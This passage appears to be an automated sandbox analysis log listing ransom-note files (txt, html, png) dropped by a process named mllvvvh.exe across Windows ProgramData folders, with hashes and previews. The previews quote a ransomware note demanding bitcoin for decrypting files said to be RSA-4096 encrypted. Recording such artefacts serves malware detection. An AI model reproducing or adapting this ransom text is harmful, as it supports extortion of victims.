                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Parental Controls\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Parental Controls\settings\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Parental Controls\settings\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Parental Controls\settings\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Ringtones\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Ringtones\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Ringtones\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Sqm\Manifest\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Sqm\Manifest\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Sqm\Manifest\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Sqm\Sessions\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Sqm\Sessions\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\Sqm\Sessions\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Sqm\Upload\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
